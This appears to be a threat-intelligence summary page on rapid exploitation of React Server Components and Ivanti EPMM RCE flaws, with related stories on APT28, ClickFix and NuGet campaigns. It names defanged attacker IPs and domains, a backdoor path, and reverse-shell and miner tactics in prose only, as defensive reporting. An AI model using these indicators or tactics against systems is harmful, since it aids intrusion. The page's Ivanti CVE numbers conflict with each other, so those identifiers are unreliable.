Rapid Post-Disclosure Exploitation of Critical RCE Vulnerabilities
Security teams reported rapid, opportunistic exploitation of newly disclosed unauthenticated remote code execution (RCE) flaws, with attackers moving quickly from scanning to compromise. JPCERT/CC documented active compromise following disclosure of React2Shell in React Server Components (CVE-2025-55182), where multiple threat actors exploited the same exposed environment within days—initially dropping coin miners (e.g., xmrig), then deploying additional payloads including the HISONIC backdoor, SNOWLIGHT downloader, and CrossC2, and culminating in actions like cron-based persistence and website defacement. Separately, GreyNoise telemetry cited by BleepingComputer indicated that exploitation of two critical Ivanti Endpoint Manager Mobile (EPMM) RCEs (CVE-2026-21962, CVE-2026-24061) was heavily concentrated, with a single bulletproof-hosted source IP (193[.]24[.]123[.]42, PROSPERO OOO/AS200593) responsible for 83% of observed activity and widespread use of OAST-style DNS callbacks consistent with initial-access validation.
Several other items in the set were not tied to a single, specific exploitation event. A Help Net Security “week in review” roundup mixed interviews and assorted security items (including mention of an exploited BeyondTrust RCE) without providing a cohesive, single-incident account, while an NCSC-themed weekly highlights post primarily summarized guidance and calls for participation rather than detailing a discrete compromise. A CloudATG “insights” page contained unrelated, older recap and generic security content, and a Risky Business bulletin focused on law-enforcement developments around IcedID operators (including an alleged developer faking his death) rather than vulnerability exploitation activity.
Related Entities
Vulnerabilities
Sources
Related Stories
Active Exploitation of Ivanti EPMM Flaws Used to Seed Dormant Backdoors and Validate RCE
Active exploitation is targeting **Ivanti Endpoint Manager Mobile (EPMM)** via two critical vulnerabilities—`CVE-2026-1281` (authentication bypass) and `CVE-2026-1340` (remote code execution)—with activity consistent with **initial access broker (IAB)** tradecraft rather than immediate ransomware-style monetization. Reporting indicates attackers are using exploitation to establish footholds and validate access at scale, then disengaging, suggesting the objective is to inventory and package working access for later activation or resale. Post-exploitation behavior described in research includes deployment of a **dormant, in-memory Java class loader** backdoor that is left inactive until a specific trigger is received, with an observed web-accessible artifact at `/mifs/403.jsp`. Separately, GreyNoise telemetry attributes **83% of observed Ivanti exploitation** to a single IP hosted on **bulletproof infrastructure** (PROSPERO OOO, `AS200593`) that is missing from widely circulated IOC lists, while several heavily shared “IOCs” appear to be unrelated (e.g., Windscribe VPN exit nodes primarily scanning **Oracle WebLogic** on port `7001`). GreyNoise also observed prevalent “blind” RCE verification using **OAST DNS callbacks** (rather than immediate payload deployment), reinforcing the assessment that operators are confirming exploitability and staging for follow-on access rather than executing overt actions immediately.
1 months ago
Mixed threat reporting: APT campaigns, malware delivery via compromised web assets, and ransomware exploitation
The provided items do not describe a single cohesive cybersecurity event; they span multiple unrelated threat reports and opinion pieces. Notable incident-level reporting includes **APT28** activity in Western/Central Europe (“Operation MacroMaze”) using spear-phishing lures with Office macros that beacon via `INCLUDEPICTURE` to `webhook[.]site` and then execute VBScript/CMD/batch stages for persistence and follow-on payload delivery. Separately, **MuddyWater** (Iran/MOIS-linked) was reported running “Operation Olalampo” against organizations in the Middle East and Africa, delivering new custom malware (including a **Char** backdoor using a **Telegram bot** for C2) and, in some cases, attempting exploitation of public-facing servers in addition to phishing. Criminal activity and initial-access tradecraft were also covered across distinct stories: a DFIR case study described exploitation of **Apache ActiveMQ** `CVE-2023-46604` to gain RCE, conduct post-exploitation (Metasploit/Meterpreter, privilege escalation, LSASS access, lateral movement), and ultimately deploy **LockBit**-branded ransomware via RDP using previously stolen credentials (with indications the payload was built using the leaked builder and used *Session* for communications). Multiple reports described malware delivery via compromised web assets and social engineering, including **GrayCharlie** injecting malicious JavaScript into WordPress sites to push **NetSupport RAT**, **Stealc**, and **SectopRAT** via fake updates/ClickFix-style CAPTCHAs, and a separate **ClickFix** campaign delivering a custom C++ RAT (**MIMICRAT**) through fake Cloudflare verification prompts that trick users into running PowerShell. Additional, unrelated threat reporting included a **NuGet** supply-chain attack (typosquatted `NCryptYo` plus companion packages) targeting ASP.NET Identity data and enabling backdoored authorization rules, and malicious Chrome extensions using a “**Promise Bomb**” browser-crash technique to drive users to run fake “CrashFix” PowerShell steps. Several other items were generic commentary/roundups (data breach trends, quantum preparedness, Enigma history, NATO public opinion polling, recon how-to, and a malware-newsletter link list) and do not add event-specific intelligence.
3 weeks ago
GreyNoise Reports Concentrated Exploitation of React Server Components RCE (CVE-2025-55182)
GreyNoise telemetry indicates that exploitation of **CVE-2025-55182** in **React Server Components** has shifted from broad, opportunistic scanning to concentrated, high-volume campaigns. The flaw is described as **pre-authentication RCE** with a **CVSS 10.0** and can be triggered via a single malicious **HTTP POST** request, making exposed development servers (notably on ports **3000–3002** in addition to 80/443) attractive targets. Between **Jan 26 and Feb 2, 2026**, GreyNoise observed **1,083** unique sources attempting exploitation, but **two IPs accounted for 56%** of observed activity, suggesting industrialized automation rather than ad-hoc testing. Reporting attributes **34%** of sessions to `193.142.147[.]209`, associated with payloads that open **reverse shells** back to the scanning host (including use of port **12323**), indicating intent for interactive access and potential follow-on pivoting. Another **22%** is attributed to `87.121.84[.]24`, linked to **cryptomining** activity (e.g., downloading **XMRig** from staging infrastructure); one cited staging host is `205.185.127[.]97`, associated with attacker-controlled domains (e.g., `mased[.]top`, `mercarios[.]buzz`) and adjacent subnet activity reportedly distributing **Mirai**. Separately, GreyNoise also reported a distinct reconnaissance campaign against **Citrix NetScaler/Gateway** using **tens of thousands of residential proxy IPs** to enumerate login panels and version artifacts (e.g., `/logon/LogonPoint/index.html` and `/epa/scripts/win/nsepa_setup.exe`), which appears to be pre-exploitation mapping and is not directly tied to the React CVE activity.
1 months ago